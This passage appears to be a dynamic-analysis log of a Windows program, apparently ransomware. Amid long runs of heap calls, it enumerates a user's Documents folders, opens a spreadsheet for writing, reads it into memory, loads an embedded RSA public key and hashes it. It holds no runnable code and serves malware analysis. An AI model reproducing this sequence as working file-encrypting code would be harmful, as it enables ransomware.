Size=0x830) returned 0x9c5d1d0 [0060.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.282] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\") returned="mw2tK3t ch7R6yApjv\\" [0060.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0060.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32696d0 [0060.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.282] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\") returned="xw_W- RtiM1Q0r\\" [0060.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32696d0 | out: hHeap=0x660000) returned 1 [0060.282] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0060.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88f80 [0060.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0060.282] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c88f80 | out: hHeap=0x660000) returned 1 [0060.282] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.282] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.282] PathFindFileNameW (pszPath="") returned="" [0060.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.282] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5f72bfd0, ftCreationTime.dwHighDateTime=0x1d4cdfe, ftLastAccessTime.dwLowDateTime=0x8cb61f70, ftLastAccessTime.dwHighDateTime=0x1d4cff5, ftLastWriteTime.dwLowDateTime=0x8cb61f70, ftLastWriteTime.dwHighDateTime=0x1d4cff5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.283] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5f72bfd0, ftCreationTime.dwHighDateTime=0x1d4cdfe, ftLastAccessTime.dwLowDateTime=0x8cb61f70, ftLastAccessTime.dwHighDateTime=0x1d4cff5, ftLastWriteTime.dwLowDateTime=0x8cb61f70, ftLastWriteTime.dwHighDateTime=0x1d4cff5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.283] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x379835e0, ftCreationTime.dwHighDateTime=0x1d4c745, ftLastAccessTime.dwLowDateTime=0x71954cf0, ftLastAccessTime.dwHighDateTime=0x1d4cdbd, ftLastWriteTime.dwLowDateTime=0x71954cf0, ftLastWriteTime.dwHighDateTime=0x1d4cdbd, nFileSizeHigh=0x0, nFileSizeLow=0x6f41, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6P7rf5fA1SneQ8RjIP.ods", cAlternateFileName="6P7RF5~1.ODS")) returned 1 [0060.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xee) returned 0x329e1f0 [0060.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.283] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\6P7rf5fA1SneQ8RjIP.ods") returned=".ods" [0060.283] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\6P7rf5fA1SneQ8RjIP.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\mw2tk3t ch7r6yapjv\\6p7rf5fa1sneq8rjip.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.283] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=28481) returned 1 [0060.283] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.286] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x6f1b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.286] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.286] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.286] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.286] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.286] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x6f41, lpOverlapped=0x0) returned 1 [0060.286] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.287] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.287] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.287] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0060.287] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.287] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.287] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.287] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.287] GetLastError () returned 0x0 [0060.288] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.288] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0060.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.288] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.288] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.288] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x6f40) returned 0x9c8bae8 [0060.288] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88f80 [0060.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85c80 [0060.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88fc8 [0060.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85c98 [0060.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85cc8 [0060.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ce0 [0060.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.288] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.288] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85cc8 | out: hHeap=0x660000) returned 1 [0060.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ce0 | out: hHeap=0x660000) returned 1 [0060.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, 